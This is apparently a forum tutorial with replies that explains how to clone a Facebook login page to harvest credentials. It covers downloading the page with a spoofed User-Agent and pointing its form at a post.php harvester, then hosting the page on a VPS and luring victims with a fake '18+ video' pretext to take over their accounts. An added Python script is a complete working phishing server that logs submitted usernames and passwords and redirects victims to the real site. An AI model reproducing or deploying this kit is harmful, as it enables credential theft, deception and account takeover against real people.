Clone Login Forms Manually to Capture Credentials

SET is great when you are short on time, but sometimes you want to know what is actually going on under the hood, or you have found a site that SET cannot clone.

Step 1: Select Your Target!

The first thing you are going to want to do is select the site login you wish to clone. For this tutorial I will be using Facebook, but it can be whatever you like. Some sites use JavaScript obfuscation to hide the input elements (like the login.live.com page), so the form you see in the browser is built at runtime and is not in the downloaded HTML. Most major sites still use the traditional input element method, which is what this tutorial relies on.

Step 2: Use Wget to Download the Login Page

Now that you have your site in mind, you will need to download the login page. This can be done with wget.

wget -U "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0" https://www.facebook.com/ -O facebook.html

Wget is the command used to download files.

-U sets a custom User-Agent header. If we leave this out, many sites will serve a different page, redirect us, or block the request outright, because the default "Wget/x.y" user agent makes it obvious we are not a browser. Use straight quotes around the string; curly quotes pasted from a web page will break the command.

-O means we save the file with a custom name.

Step 3: Modify the Existing Page Source.

This is where you will get your hands dirty. It can be a little confusing at times, but it is probably one of the most important steps. You will need to locate the login form on the page. My main editors are vim and atom, but I will be using atom for this tutorial. Open facebook.html (or whatever file you downloaded) in your editor and search for the form tag.

With a simple search I was able to locate the form. You will need to modify it to post to a custom PHP script. Our PHP script is called post.php and is located in the same directory as our login HTML. So change the opening form tag so that it reads `<form action="post.php" method="post">` and delete everything else between the angle brackets <> (the original action URL, id, onsubmit handlers and any data-* attributes). Leave the input elements inside the form alone; their name attributes are what the browser will post to post.php, so note them down for the harvester.

Step 4: Write/Download a Credential Harvester.

So now, when you go to the page and click login, it will attempt to post the details entered to your post.php script... which doesn't exist yet. You need to either write one or download one. I stole the one from SET and it works great. I have modified it a little too. You can get this script from this fancy looking link or steal it from SET somewhere.

Step 5: Do Some Server Magic!

Hopefully, you have a server with PHP and the like installed. Kali itself comes with Apache pre-installed and the web root is at /var/www/ (newer Debian-based Apache packages use /var/www/html; the chown below covers both).

If you're like me, you use a hosted VPS. If you want one, you can upload a Kali ISO to it to make social engineering engagements more convincing and easier. I personally use a VPS hosting provider called Vultr, and you can get $5 free credit if you use this link, which is easily enough for a quick engagement. You can also register a free domain at freenom.com. This is great if you don't exactly want to spend a lot of money but just want to try it all out.

Anyway... Once you've uploaded the files to a server, you may find you can enter your details on the page and be redirected, but no harvest files are created. The PHP script runs as the web server's user (www-data on Debian-based systems such as Kali), and that user cannot write into a directory owned by root or by the account you uploaded with. To fix this, use chown to make www-data the owner of the web root:

chown -R www-data:www-data /var/www

This fixes most problems for me!

Step 6: Social Engineer!

Now you will need to “get creative!”. Send the target an email or a message with something compelling on the other side that requires them to login. My common pretext is telling somebody about an extremely funny video that is 18+ rated, and they will need to re-login in order to watch it, I then edited the post.php to redirect to a funny video. By the time they’ve finished laughing, you are already in their account.

Hopefully this is of help to you people! I learnt how to do this by playing with it and looking at what SET did, and it helped me to understand it all better :slight_smile:

pry0cc

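The following is an added example, not pry0cc's code and not SET's harvester. It automates Steps 2 to 5 in Python instead of by hand: fetching the page with a browser User-Agent, stripping the cloned `<form>` tag down to `action="post.php" method="post"`, listing the input names the harvester should expect, and a stand-in for post.php that records the POSTed fields and redirects the victim. The sample HTML, file names, the 8080 port and the redirect URL are assumptions for illustration; the real page you download will differ.

```python
#!/usr/bin/env python3
"""Added example (not pry0cc's code, not SET's PHP harvester).

Stand-ins for Steps 2-5 of the post:
  fetch_page()          - wget -U "...": download with a browser User-Agent
  rewrite_form_action() - Step 3: make the first <form> post to post.php
  form_field_names()    - which <input name=...> values will be submitted
  record_submission()   - Step 4: decode the POST body, append to harvest file
  Harvester             - serves index.html and plays the role of post.php
All file names, the port and the sample HTML below are assumptions.
"""
from html.parser import HTMLParser
from urllib.parse import parse_qs
import http.server
import json
import re
import urllib.request

BROWSER_UA = "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0"
HARVEST_FILE = "harvest.txt"                 # assumed output path
REDIRECT_URL = "https://www.facebook.com/"   # where the victim lands afterwards

# Constructed sample standing in for the wget output; NOT the real Facebook page.
SAMPLE_HTML = """<html><body>
<form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1"
      method="post" onsubmit="return validate(this)">
<input type="email" name="email"><input type="password" name="pass">
<input type="hidden" name="lsd" value="AVq1"><input type="submit" value="Log In">
</form></body></html>"""


def fetch_page(url, user_agent=BROWSER_UA):
    """Equivalent of `wget -U "<ua>" <url>`: sites that bounce the default
    Wget user agent get a browser-looking one instead.  Network access needed."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req) as resp:
        return resp.read().decode("utf-8", "replace")


def rewrite_form_action(html, action="post.php"):
    """Replace the first <form ...> opening tag with one that posts to `action`.

    Every other attribute (original action, id, onsubmit, data-*) is dropped,
    which is the manual edit in Step 3.  Caveat: the regex assumes no '>'
    inside an attribute value, so open the result in a browser to check it."""
    new_tag = '<form action="%s" method="post">' % action
    return re.sub(r"<form\b[^>]*>", new_tag, html, count=1, flags=re.IGNORECASE)


class _InputCollector(HTMLParser):
    """Collects the name of every <input> the browser will actually submit."""

    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "input":
            return
        a = dict(attrs)
        if a.get("type", "text").lower() in ("submit", "button", "reset", "image"):
            return                       # buttons carry no credential
        if a.get("name"):
            self.names.append(a["name"])


def form_field_names(html):
    """Field names to expect in the POST; sites rarely call the field 'password'."""
    p = _InputCollector()
    p.feed(html)
    return p.names


def record_submission(body, path=None):
    """Decode an application/x-www-form-urlencoded body into a dict and,
    if `path` is given, append it as one JSON line (the harvest file)."""
    fields = {k: v[0] for k, v in parse_qs(body.decode("utf-8", "replace")).items()}
    if path:
        with open(path, "a") as fh:      # needs write access, hence the chown step
            fh.write(json.dumps(fields) + "\n")
    return fields


class Harvester(http.server.SimpleHTTPRequestHandler):
    """GET serves index.html from the current directory; POST is post.php."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        record_submission(self.rfile.read(length), HARVEST_FILE)
        self.send_response(302)          # bounce the victim to the real site
        self.send_header("Location", REDIRECT_URL)
        self.end_headers()


if __name__ == "__main__":
    with open("index.html", "w") as fh:  # assumed: cloned page served as the index
        fh.write(rewrite_form_action(SAMPLE_HTML))
    print("fields the harvester will see:", form_field_names(SAMPLE_HTML))
    http.server.HTTPServer(("127.0.0.1", 8080), Harvester).serve_forever()
```

Run it in an empty directory, browse to http://127.0.0.1:8080/, submit the form, and each submission appears as one JSON line in harvest.txt before the browser is redirected. To use a real download instead of the constructed sample, pass the output of `fetch_page(url)` to `rewrite_form_action()`; the same regex caveat applies, and pages that build the form with JavaScript (the login.live.com case above) will show no input names at all, which is your signal that this manual method will not work on them.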

Well written! I have a couple questions mainly about the server/hosting process:

What do you mean by “Hopefully, you have a server with PHP and the like installed”, and what do I do with the pre-installed Apache directory (/var/www/)?


good tut pry0cc. Might have to try this out!


Thanks! :wink:

To serve up the cloned site, you need a server to host the content, otherwise nobody will be able to see it. Therefore you need to put the cloned and modified HTML page there, name it index.html, and put the post.php script in there as well.

Thanks, I think I need to do some more reading about server hosting and especially Apache.

I perhaps could do some tutorials? Would that be good?

Very good and interesting article. Keep it up!

Thanks man! I wrote this a while ago!
